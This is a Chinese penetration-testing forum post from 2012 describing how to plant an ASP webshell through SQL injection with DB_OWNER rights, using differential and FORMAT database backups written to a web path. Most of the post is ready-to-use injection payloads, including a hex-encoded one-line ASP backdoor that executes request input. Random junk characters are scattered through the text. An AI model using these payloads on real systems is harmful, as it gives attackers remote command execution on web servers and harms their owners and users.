中国网络渗透测试联盟

标题: DB_OWNER权限得到webshell的改进方法 [打印本页]
作者: admin    时间: 2012-12-31 09:57
标题: DB_OWNER权限得到webshell的改进方法
减少备份文件大小,得到可执行的webshell成功率提高不少
, W2 I2 ~8 @- v" K7 J' B
- D6 i8 Z  E8 k' ^5 R一利用差异备份
" {" K) K/ r$ \3 D! }加一个参数WITH DIFFERENTIAL+ ^. @. E. S2 }  Q+ y! ?& o3 p

; d- f. b) [0 pdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
" b) M; _1 E- c8 v3 O& k' f* Tcreate table [dbo].[xiaolu] ([cmd] [image]);) H( l+ x: C; V; e: d9 S
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
- |* y4 _' R5 Q  R) W6 G2 rdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL
) `. \; P3 }) j2 i8 V- j$ A" G/ I
$ z7 d1 ], F% o+ S1 O; J: G二利用完全FORMAT
7 x% K( @9 u$ |* p0 e+ Q: }4 B加一个参数WITH FROMAT" `" V3 [  k7 b( a/ `/ J- l- D
有些页面对数据库要执行几次,而备份又默认是每次都以追加的方式,如果一个注入点对数据库有几次操作,而备份的文件就 几倍的增加,所以! |. {# H! `- f

- v4 o; X8 ]; d/ Adeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s; r8 Q0 T" U3 w. U
create table [dbo].[xiaolu] ([cmd] [image]); insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
$ e5 W. P# Q' _; [* sdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT
( I" I* S; n5 @: `2 o2 H( L0 J0 N
7 \) N) g' B; E6 q  ^总的来说就是那么简单几句,下面以备份数据库model为例子' w( y0 P8 c) \8 ?

4 B. b9 r) d3 F3 ~id=1;use model create table cmd(str image);insert into cmd(str) values (”)) A' @( Q/ e  u) i: U, D+ [  D

- P" Z3 T6 A8 d2 }id=1;backup database model to disk=’你的路径‘ with differential,format;–
  ?  @# N- v7 T9 r2 N$ e. `3 g4 U: o8 ~8 ~% |




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2